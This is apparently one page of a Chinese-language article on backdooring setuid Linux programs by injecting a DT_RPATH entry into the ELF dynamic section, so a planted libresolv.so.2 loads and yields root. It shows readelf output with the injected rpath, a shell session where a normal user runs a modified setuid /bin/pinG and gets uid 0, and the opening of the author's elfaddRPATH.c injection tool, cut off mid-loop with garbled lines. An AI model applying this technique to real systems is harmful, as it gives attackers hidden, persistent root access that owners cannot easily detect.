Linux系统下解析Elf文件DT_RPATH后门

Dynamic segment at offset 0x5618 contains 22 entries:

Tag Type Name/Value

0x00000001 (NEEDED) Shared library: [libresolv。so。2]

0x00000001 (NEEDED) Shared library: [libc。so。6]

0x0000000c (INIT) 0x8048a7c

0x0000000d (FINI) 0x804bfb0

0x00000004 (HASH) 0x8048128

0x00000005 (STRTAB) 0x8048610

0x00000006 (SYMTAB) 0x80482a0

0x0000000a (STRSZ) 541 (bytes)

0x0000000b (SYMENT) 16 (bytes)

0x00000015 (DEBUG) 0x0

0x00000003 (PLTGOT) 0x804e554

0x00000002 (PLTRELSZ) 360 (bytes)

0x00000014 (PLTREL) REL

0x00000017 (JMPREL) 0x8048914

0x00000011 (REL) 0x80488e4

0x00000012 (RELSZ) 48 (bytes)

0x00000013 (RELENT) 8 (bytes)

0x6ffffffe (VERNEED) 0x80488b4

0x6fffffff (VERNEEDNUM) 1

0x6ffffff0 (VERSYM) 0x8048844

0x0000000f (RPATH) Library rpath: [_wujianqiang:]

0x00000000 (NULL) 0x0

[root@redhat72 disp]# exit

exit

[wujian@redhat72 elf_door]$ cd disp

[wujian@redhat72 disp]$ ls -l

total 28

-rwxr-xr-x 1 root root 17822 Apr 27 00:36 addelfrpath

-rwxr-xr-x 1 root root 5610 Apr 27 00:36 libresolv。so。2

[wujian@redhat72 disp]$ ls -l /bin/pinG

-rwsr-xr-x 1 root root 23436 Apr 27 00:38 /bin/pinG

[wujian@redhat72 disp]$ /bin/pinG

[root@redhat72 disp]# id

uid=0(root) gid=500(wujian) groups=500(wujian)

[root@redhat72 disp]#

  三。结论

    通过一些实验，基本上所有的suid的程序只要加载了依赖的。SO就可以添加这个后门。这是一项简单而巧妙的技术，而且不宜被发现，所以一个完整性校检是安全的重要保证，但我对一个系统被入侵后还能不能用已经不报希望了：）

  四。程序实现

/*

* elfaddRPATH。c

* by wujian (wujianqiangis@mail。china。com) only tested on rh72。

* only for test :) thanks alert7@xfocus scz@nsfocus wandb@nsfocus silvio@big。net。au

* about ELF articles。

*

*/

#include //not supply the header files :) and some simple codez not supply

#define ERR(fn) { perror(fn);exit(1);}

char * symgname= "__gmon_start__";//default modify symbol name

char * m_symgname="__gmon_start:";

char * myname="_wujianqiang:" //modify to 。。。

void elf_check(Elf32_Ehdr *ehdr);

static int add_ent(int fd ,unsigned int * index , Elf32_Ehdr * ehdr, Elf32_Shdr * shdr);

static int mod_sym(int fd , Elf32_Ehdr * ehdr,Elf32_Shdr * shdr,char * symname);

/*---------------------------------add entry in 。dynamic section-------------------------*/

static int add_ent(int fd ,unsigned int * index , Elf32_Ehdr * ehdr, Elf32_Shdr * shdr)

{

Elf32_Shdr * shdyn=shdr;

Elf32_Dyn * dyn,*dynp;

int i,offset=0;

int ent=0;

int find=0;

int dt_rpath=15; //from elf spec DT_RPATH=15

for(i=0;ie_shnum;i++)

上一页  [1] [2] [3] [4] [5] [6] [7] 下一页

【责编:Youping】